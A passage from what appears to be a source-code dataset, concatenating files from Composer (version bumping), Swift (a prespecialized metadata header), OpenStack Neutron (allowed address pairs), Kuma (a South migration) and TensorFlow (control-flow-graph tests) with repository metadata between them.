$io->writeError('<warning>If your package is not a library, you can explicitly specify the "type" by using "composer config type project".</warning>');
$io->writeError('<warning>Alternatively you can use '.$devOnlyFlagHint.' to only bump dependencies within "require-dev".</warning>');
}
unset($contents);
}
$bumper = new VersionBumper();
$tasks = [];
if (!$devOnly) {
$tasks['require'] = $composer->getPackage()->getRequires();
}
if (!$noDevOnly) {
$tasks['require-dev'] = $composer->getPackage()->getDevRequires();
}
if (count($packagesFilter) > 0) {
// support proxied args from the update command that contain constraints together with the package names
$packagesFilter = array_map(static function ($constraint) {
return Preg::replace('{[:= ].+}', '', $constraint);
}, $packagesFilter);
$pattern = BasePackage::packageNamesToRegexp(array_unique(array_map('strtolower', $packagesFilter)));
foreach ($tasks as $key => $reqs) {
foreach ($reqs as $pkgName => $link) {
if (!Preg::isMatch($pattern, $pkgName)) {
unset($tasks[$key][$pkgName]);
}
}
}
}
$updates = [];
foreach ($tasks as $key => $reqs) {
foreach ($reqs as $pkgName => $link) {
if (PlatformRepository::isPlatformPackage($pkgName)) {
continue;
}
$currentConstraint = $link->getPrettyConstraint();
$package = $repo->findPackage($pkgName, '*');
// name must be provided or replaced
if (null === $package) {
continue;
}
while ($package instanceof AliasPackage) {
$package = $package->getAliasOf();
}
$bumped = $bumper->bumpRequirement($link->getConstraint(), $package);
if ($bumped === $currentConstraint) {
continue;
}
$updates[$key][$pkgName] = $bumped;
}
}
if (!$dryRun && !$this->updateFileCleanly($composerJson, $updates)) {
$composerDefinition = $composerJson->read();
foreach ($updates as $key => $packages) {
foreach ($packages as $package => $version) {
$composerDefinition[$key][$package] = $version;
}
}
$composerJson->write($composerDefinition);
}
$changeCount = array_sum(array_map('count', $updates));
if ($changeCount > 0) {
if ($dryRun) {
$io->write('<info>' . $composerJsonPath . ' would be updated with:</info>');
foreach ($updates as $requireType => $packages) {
foreach ($packages as $package => $version) {
$io->write(sprintf('<info> - %s.%s: %s</info>', $requireType, $package, $version));
}
}
} else {
$io->write('<info>' . $composerJsonPath . ' has been updated (' . $changeCount . ' changes).</info>');
}
} else {
$io->write('<info>No requirements to update in '.$composerJsonPath.'.</info>');
}
if (!$dryRun && $composer->getLocker()->isLocked() && $composer->getConfig()->get('lock') && $changeCount > 0) {
$composer->getLocker()->updateHash($composerJson);
}
if ($dryRun && $changeCount > 0) {
return self::ERROR_GENERIC;
}
return 0;
}
/**
* @param array<'require'|'require-dev', array<string, string>> $updates
*/
private function updateFileCleanly(JsonFile $json, array $updates): bool
{
$contents = file_get_contents($json->getPath());
if (false === $contents) {
throw new \RuntimeException('Unable to read '.$json->getPath().' contents.');
}
$manipulator = new JsonManipulator($contents);
foreach ($updates as $key => $packages) {
foreach ($packages as $package => $version) {
if (!$manipulator->addLink($key, $package, $version)) {
return false;
}
}
}
if (false === file_put_contents($json->getPath(), $manipulator->getContents())) {
throw new \RuntimeException('Unable to write new '.$json->getPath().' contents.');
}
return true;
}
}
|
php
|
github
|
https://github.com/composer/composer
|
src/Composer/Command/BumpCommand.php
|
//===--- LibPrespecialized.h - Interface for prespecializations -*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2024 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// Interface for interacting with prespecialized metadata library.
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_LIB_PRESPECIALIZED_H
#define SWIFT_LIB_PRESPECIALIZED_H
#include "PrebuiltStringMap.h"
#include "swift/ABI/Metadata.h"
#include "swift/ABI/TargetLayout.h"
#include "swift/Demangling/Demangler.h"
#define LIB_PRESPECIALIZED_TOP_LEVEL_SYMBOL_NAME "_swift_prespecializationsData"
namespace swift {
template <typename Runtime>
struct LibPrespecializedData {
uint32_t majorVersion;
uint32_t minorVersion;
TargetPointer<Runtime, const void> metadataMap;
TargetPointer<Runtime, const void> disabledProcessesTable;
TargetPointer<Runtime, const void> pointerKeyedMetadataMap;
typename Runtime::StoredSize optionFlags;
TargetPointer<Runtime, const void> descriptorMap;
// Existing fields are above, add new fields below this point.
// The major/minor version numbers for this version of the struct.
static constexpr uint32_t currentMajorVersion = 1;
static constexpr uint32_t currentMinorVersion = 4;
// Version numbers where various fields were introduced.
static constexpr uint32_t minorVersionWithDisabledProcessesTable = 2;
static constexpr uint32_t minorVersionWithPointerKeyedMetadataMap = 3;
static constexpr uint32_t minorVersionWithOptionFlags = 3;
static constexpr uint32_t minorVersionWithDescriptorMap = 4;
// Option flags values.
enum : typename Runtime::StoredSize {
// When this flag is set, the runtime should default to using the
// pointer-keyed table. When not set, default to using the name-keyed table.
OptionFlagDefaultToPointerKeyedMap = 1ULL << 0,
// When this flag is set, the runtime should default to using the descriptor
// map. When not set, default to turning off the descriptor map.
OptionFlagDescriptorMapDefaultOn = 1ULL << 1,
// When this flag is set, descriptorMap is not comprehensive, meaning that
// a negative lookup result is not a definitive failure.
OptionFlagDescriptorMapNotComprehensive = 1ULL << 2,
};
// Helpers for safely retrieving various fields. Helpers return 0 or NULL if
// the version number indicates that the field is not present.
typename Runtime::StoredSize getOptionFlags() const {
if (minorVersion < minorVersionWithOptionFlags)
return 0;
return optionFlags;
}
static bool stringIsNull(const char *str) { return str == nullptr; }
using MetadataMap = PrebuiltStringMap<const char *, Metadata *, stringIsNull>;
const MetadataMap *getMetadataMap() const {
return reinterpret_cast<const MetadataMap *>(metadataMap);
}
const char *const *getDisabledProcessesTable() const {
if (minorVersion < minorVersionWithDisabledProcessesTable)
return nullptr;
return reinterpret_cast<const char *const *>(disabledProcessesTable);
}
const void *getPointerKeyedMetadataMap() const {
if (minorVersion < minorVersionWithPointerKeyedMetadataMap)
return nullptr;
return pointerKeyedMetadataMap;
}
using DescriptorMap =
PrebuiltAuxDataImplicitStringMap<TargetPointer<Runtime, const void>,
uint16_t>;
const DescriptorMap *getDescriptorMap() const {
if (minorVersion < minorVersionWithDescriptorMap)
return nullptr;
return reinterpret_cast<const DescriptorMap *>(descriptorMap);
}
};
enum class LibPrespecializedLookupResult {
// We found something.
Found,
// We didn't find anything, and we know it's not in the shared cache.
DefinitiveNotFound,
// We didn't find anything, but we couldn't rule out the shared cache. Caller
// must do a full search.
NonDefinitiveNotFound,
};
const LibPrespecializedData<InProcess> *getLibPrespecializedData();
Metadata *getLibPrespecializedMetadata(const TypeContextDescriptor *description,
const void *const *arguments);
void libPrespecializedImageLoaded();
std::pair<LibPrespecializedLookupResult, const TypeContextDescriptor *>
getLibPrespecializedTypeDescriptor(Demangle::NodePointer node);
/// Given the demangling referring to a particular descriptor, build the
/// canonical simplified version of the demangling that's used for the keys in
/// the descriptorMap. We copy across Extension and Module nodes. Type nodes are
/// all normalized to be OtherNominalType to allow for the runtime allowing
/// type kind mismatches on imported C types in certain cases. Other nodes are
/// skipped.
///
/// The runtime always searches through duplicates in the table, and uses its
/// own matching on all candidates, so the simplified demangling is allowed to
/// be simplified to the point of having different descriptors sometimes produce
/// the same demangling.
static inline Demangle::NodePointer
buildSimplifiedDescriptorDemangling(Demangle::NodePointer node,
Demangle::Demangler &dem) {
// The node that will be returned to the caller.
Demangle::NodePointer result = nullptr;
// The bottommost node in the result that we've generated. Additional nodes
// are added as children to this one.
Demangle::NodePointer resultBottom = nullptr;
// The current node that we're iterating over in the input node tree.
Demangle::NodePointer current = node;
using Kind = Demangle::Node::Kind;
// Helper to add a new node to the result. This sets `result` to the node if
// it hasn't already been set (indicating this is the topmost node), and adds
// the node as a child to `resultBottom` otherwise. `resultBottom` is updated
// to point to the new node.
auto addNode = [&](Demangle::NodePointer newNode) {
if (!result) {
result = newNode;
} else {
if (resultBottom->getKind() == Kind::Extension) {
resultBottom->addChild(newNode, dem);
} else {
// Shift the Identifier down, insert before it.
resultBottom->addChild(resultBottom->getFirstChild(), dem);
resultBottom->replaceChild(0, newNode);
}
}
resultBottom = newNode;
};
// Walk down the input node tree.
while (current) {
switch (current->getKind()) {
case Kind::Extension: {
// Extensions are copied across. The new extension node has the module
// from the original, and the second child will be added as we traverse
// the next node in the tree.
auto copy = dem.createNode(Kind::Extension);
auto module = current->getChild(0);
if (module == nullptr || module->getKind() != Kind::Module)
return nullptr;
copy->addChild(module, dem);
addNode(copy);
current = current->getChild(1);
break;
}
case Kind::Module: {
// Module contents are always in the form we want, so we can incorporate
// this node verbatim and terminate the walk.
addNode(current);
current = nullptr;
break;
}
case Kind::Protocol: {
// Bring Protocol nodes across verbatim, there's no fuzzy matching.
addNode(current);
current = nullptr;
break;
}
case Kind::OpaqueType:
case Kind::Class:
case Kind::Structure:
case Kind::Enum:
case Kind::TypeAlias:
case Kind::OtherNominalType: {
// Type nodes are copied across with the kind always set to
// OtherNominalType.
auto copy = dem.createNode(Kind::OtherNominalType);
auto identifier = current->getChild(1);
if (identifier == nullptr || identifier->getKind() != Kind::Identifier)
return nullptr;
copy->addChild(identifier, dem);
addNode(copy);
current = current->getChild(0);
break;
}
default:
// If we don't know about this node, continue the walk with its first
// child.
current = current->getFirstChild();
break;
}
}
return result;
}
} // namespace swift
// Validate the prespecialized metadata map by building each entry dynamically
// and comparing. This should be called before any metadata is built for other
// purposes, as any prespecialized entries that have already been cached will
// not be rebuilt, so the validation will be comparing the prespecialized
// metadata with itself.
//
// On return, outValidated is set to the total number of metadata records that
// were validated (which is the total number in the table), and outFailed is set
// to the number that failed validation.
SWIFT_RUNTIME_EXPORT
void _swift_validatePrespecializedMetadata();
#endif // SWIFT_LIB_PRESPECIALIZED_H
|
c
|
github
|
https://github.com/apple/swift
|
include/swift/Runtime/LibPrespecialized.h
|
# Copyright 2013 VMware, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.api.v2 import attributes as attr
from neutron.db import db_base_plugin_v2
from neutron.db import model_base
from neutron.db import models_v2
from neutron.extensions import allowedaddresspairs as addr_pair
class AllowedAddressPair(model_base.BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
mac_address = sa.Column(sa.String(32), nullable=False, primary_key=True)
ip_address = sa.Column(sa.String(64), nullable=False, primary_key=True)
port = orm.relationship(
models_v2.Port,
backref=orm.backref("allowed_address_pairs",
lazy="joined", cascade="delete"))
class AllowedAddressPairsMixin(object):
"""Mixin class for allowed address pairs."""
def _process_create_allowed_address_pairs(self, context, port,
allowed_address_pairs):
if not attr.is_attr_set(allowed_address_pairs):
return []
with context.session.begin(subtransactions=True):
for address_pair in allowed_address_pairs:
# use port.mac_address if no mac address in address pair
if 'mac_address' not in address_pair:
address_pair['mac_address'] = port['mac_address']
db_pair = AllowedAddressPair(
port_id=port['id'],
mac_address=address_pair['mac_address'],
ip_address=address_pair['ip_address'])
context.session.add(db_pair)
return allowed_address_pairs
def get_allowed_address_pairs(self, context, port_id):
pairs = (context.session.query(AllowedAddressPair).
filter_by(port_id=port_id))
return [self._make_allowed_address_pairs_dict(pair)
for pair in pairs]
def _extend_port_dict_allowed_address_pairs(self, port_res, port_db):
# If port_db is provided, allowed address pairs will be accessed via
# sqlalchemy models. As they're loaded together with ports this
# will not cause an extra query.
allowed_address_pairs = [
self._make_allowed_address_pairs_dict(address_pair) for
address_pair in port_db.allowed_address_pairs]
port_res[addr_pair.ADDRESS_PAIRS] = allowed_address_pairs
return port_res
# Register dict extend functions for ports
db_base_plugin_v2.NeutronDbPluginV2.register_dict_extend_funcs(
attr.PORTS, ['_extend_port_dict_allowed_address_pairs'])
def _delete_allowed_address_pairs(self, context, id):
query = self._model_query(context, AllowedAddressPair)
with context.session.begin(subtransactions=True):
query.filter(AllowedAddressPair.port_id == id).delete()
def _make_allowed_address_pairs_dict(self, allowed_address_pairs,
fields=None):
res = {'mac_address': allowed_address_pairs['mac_address'],
'ip_address': allowed_address_pairs['ip_address']}
return self._fields(res, fields)
def _has_address_pairs(self, port):
return (attr.is_attr_set(port['port'][addr_pair.ADDRESS_PAIRS])
and port['port'][addr_pair.ADDRESS_PAIRS] != [])
def _check_update_has_allowed_address_pairs(self, port):
"""Determine if request has an allowed address pair.
Return True if the port parameter has a non-empty
'allowed_address_pairs' attribute. Otherwise returns False.
"""
return (addr_pair.ADDRESS_PAIRS in port['port'] and
self._has_address_pairs(port))
def _check_update_deletes_allowed_address_pairs(self, port):
"""Determine if request deletes address pair.
Return True if port has as a allowed address pair and its value
is either [] or not is_attr_set, otherwise return False
"""
return (addr_pair.ADDRESS_PAIRS in port['port'] and
not self._has_address_pairs(port))
def is_address_pairs_attribute_updated(self, port, update_attrs):
"""Check if the address pairs attribute is being updated.
Returns True if there is an update. This can be used to decide
if a port update notification should be sent to agents or third
party controllers.
"""
new_pairs = update_attrs.get(addr_pair.ADDRESS_PAIRS)
if new_pairs is None:
return False
old_pairs = port.get(addr_pair.ADDRESS_PAIRS)
# Missing or unchanged address pairs in attributes mean no update
return new_pairs != old_pairs
def update_address_pairs_on_port(self, context, port_id, port,
original_port, updated_port):
"""Update allowed address pairs on port.
Returns True if an update notification is required. Notification
is not done here because other changes on the port may need
notification. This method is expected to be called within
a transaction.
"""
new_pairs = port['port'].get(addr_pair.ADDRESS_PAIRS)
if self.is_address_pairs_attribute_updated(original_port,
port['port']):
updated_port[addr_pair.ADDRESS_PAIRS] = new_pairs
self._delete_allowed_address_pairs(context, port_id)
self._process_create_allowed_address_pairs(
context, updated_port, new_pairs)
return True
return False
|
unknown
|
codeparrot/codeparrot-clean
| ||
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Revision.tags'
db.add_column('wiki_revision', 'tags', self.gf('django.db.models.fields.CharField')(default='', max_length=255, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Revision.tags'
db.delete_column('wiki_revision', 'tags')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'tidings.watch': {
'Meta': {'object_name': 'Watch'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'db_index': 'True', 'max_length': '75', 'null': 'True', 'blank': 'True'}),
'event_type': ('django.db.models.fields.CharField', [], {'max_length': '30', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
},
'wiki.document': {
'Meta': {'unique_together': "(('parent', 'locale'), ('slug', 'locale'))", 'object_name': 'Document'},
'category': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'current_revision': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'current_for+'", 'null': 'True', 'to': "orm['wiki.Revision']"}),
'html': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_localizable': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'is_template': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'locale': ('kuma.core.fields.LocaleField', [], {'default': "'en-US'", 'max_length': '7', 'db_index': 'True'}),
'mindtouch_page_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'translations'", 'null': 'True', 'to': "orm['wiki.Document']"}),
'related_documents': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['wiki.Document']", 'through': "orm['wiki.RelatedDocument']", 'symmetrical': 'False'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
'wiki.editortoolbar': {
'Meta': {'object_name': 'EditorToolbar'},
'code': ('django.db.models.fields.TextField', [], {'max_length': '2000'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_toolbars'", 'to': "orm['auth.User']"}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'wiki.firefoxversion': {
'Meta': {'unique_together': "(('item_id', 'document'),)", 'object_name': 'FirefoxVersion'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'firefox_version_set'", 'to': "orm['wiki.Document']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_id': ('django.db.models.fields.IntegerField', [], {})
},
'wiki.helpfulvote': {
'Meta': {'object_name': 'HelpfulVote'},
'anonymous_id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'poll_votes'", 'null': 'True', 'to': "orm['auth.User']"}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'poll_votes'", 'to': "orm['wiki.Document']"}),
'helpful': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user_agent': ('django.db.models.fields.CharField', [], {'max_length': '1000'})
},
'wiki.operatingsystem': {
'Meta': {'unique_together': "(('item_id', 'document'),)", 'object_name': 'OperatingSystem'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'operating_system_set'", 'to': "orm['wiki.Document']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_id': ('django.db.models.fields.IntegerField', [], {})
},
'wiki.relateddocument': {
'Meta': {'ordering': "['-in_common']", 'object_name': 'RelatedDocument'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'related_from'", 'to': "orm['wiki.Document']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_common': ('django.db.models.fields.IntegerField', [], {}),
'related': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'related_to'", 'to': "orm['wiki.Document']"})
},
'wiki.reviewtag': {
'Meta': {'object_name': 'ReviewTag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'})
},
'wiki.reviewtaggedrevision': {
'Meta': {'object_name': 'ReviewTaggedRevision'},
'content_object': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Revision']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.ReviewTag']"})
},
'wiki.revision': {
'Meta': {'object_name': 'Revision'},
'based_on': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Revision']", 'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'content': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_revisions'", 'to': "orm['auth.User']"}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['wiki.Document']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_approved': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'is_mindtouch_migration': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'mindtouch_old_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True', 'db_index': 'True'}),
'reviewed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'reviewer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviewed_revisions'", 'null': 'True', 'to': "orm['auth.User']"}),
'significance': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {}),
'tags': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'})
}
}
complete_apps = ['wiki']
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for cfg module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.pyct import cfg
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.platform import test
class CountingVisitor(cfg.GraphVisitor):
def __init__(self, graph):
super(CountingVisitor, self).__init__(graph)
self.counts = {}
def init_state(self, _):
return None
def visit_node(self, node):
self.counts[node.ast_node] = self.counts.get(node.ast_node, 0) + 1
return False # visit only once
class GraphVisitorTest(test.TestCase):
def _build_cfg(self, fn):
node, _ = parser.parse_entity(fn, future_features=())
cfgs = cfg.build(node)
return cfgs, node
def test_basic_coverage_forward(self):
def test_fn(a):
while a > 0:
a = 1
break
return a # pylint:disable=unreachable
a = 2
graphs, node = self._build_cfg(test_fn)
graph, = graphs.values()
visitor = CountingVisitor(graph)
visitor.visit_forward()
self.assertEqual(visitor.counts[node.args], 1)
self.assertEqual(visitor.counts[node.body[0].test], 1)
self.assertEqual(visitor.counts[node.body[0].body[0]], 1)
self.assertEqual(visitor.counts[node.body[0].body[1]], 1)
# The return node should be unreachable in forward direction.
self.assertNotIn(node.body[0].body[2], visitor.counts)
self.assertEqual(visitor.counts[node.body[1]], 1)
def test_basic_coverage_reverse(self):
def test_fn(a):
while a > 0:
a = 1
break
return a # pylint:disable=unreachable
a = 2
graphs, node = self._build_cfg(test_fn)
graph, = graphs.values()
visitor = CountingVisitor(graph)
visitor.visit_reverse()
self.assertEqual(visitor.counts[node.args], 1)
self.assertEqual(visitor.counts[node.body[0].test], 1)
self.assertEqual(visitor.counts[node.body[0].body[0]], 1)
self.assertEqual(visitor.counts[node.body[0].body[1]], 1)
self.assertTrue(visitor.counts[node.body[0].body[2]], 1)
self.assertEqual(visitor.counts[node.body[1]], 1)
class AstToCfgTest(test.TestCase):
def _build_cfg(self, fn):
node, _ = parser.parse_entity(fn, future_features=())
cfgs = cfg.build(node)
return cfgs
def _repr_set(self, node_set):
return frozenset(repr(n) for n in node_set)
def _as_set(self, elements):
if elements is None:
return frozenset()
elif isinstance(elements, str):
return frozenset((elements,))
else:
return frozenset(elements)
def assertGraphMatches(self, graph, edges):
"""Tests whether the CFG contains the specified edges."""
for prev, node_repr, next_ in edges:
matched = False
for cfg_node in graph.index.values():
if repr(cfg_node) == node_repr:
if (self._as_set(prev) == frozenset(map(repr, cfg_node.prev)) and
self._as_set(next_) == frozenset(map(repr, cfg_node.next))):
matched = True
break
if not matched:
self.fail(
'match failed for node "%s" in graph:\n%s' % (node_repr, graph))
def assertStatementEdges(self, graph, edges):
"""Tests whether the CFG contains the specified statement edges."""
for prev_node_reprs, node_repr, next_node_reprs in edges:
matched = False
partial_matches = []
self.assertSetEqual(
frozenset(graph.stmt_next.keys()), frozenset(graph.stmt_prev.keys()))
for stmt_ast_node in graph.stmt_next:
ast_repr = '%s:%s' % (stmt_ast_node.__class__.__name__,
stmt_ast_node.lineno)
if ast_repr == node_repr:
actual_next = frozenset(map(repr, graph.stmt_next[stmt_ast_node]))
actual_prev = frozenset(map(repr, graph.stmt_prev[stmt_ast_node]))
partial_matches.append((actual_prev, node_repr, actual_next))
if (self._as_set(prev_node_reprs) == actual_prev and
self._as_set(next_node_reprs) == actual_next):
matched = True
break
if not matched:
self.fail('edges mismatch for %s: %s' % (node_repr, partial_matches))
def test_straightline(self):
def test_fn(a):
a += 1
a = 2
a = 3
return
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a', 'a += 1'),
('a += 1', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', 'return'),
('a = 3', 'return', None),
),
)
def test_straightline_no_return(self):
def test_fn(a, b):
a = b + 1
a += max(a)
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a, b', 'a = b + 1'),
('a = b + 1', 'a += max(a)', None),
),
)
def test_unreachable_code(self):
def test_fn(a):
return
a += 1 # pylint:disable=unreachable
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a', 'return'),
('a', 'return', None),
(None, 'a += 1', None),
),
)
def test_if_straightline(self):
def test_fn(a):
if a > 0:
a = 1
else:
a += -1
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a', '(a > 0)'),
('(a > 0)', 'a = 1', None),
('(a > 0)', 'a += -1', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'If:2', None),),
)
def test_branch_nested(self):
def test_fn(a):
if a > 0:
if a > 1:
a = 1
else:
a = 2
else:
if a > 2:
a = 3
else:
a = 4
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
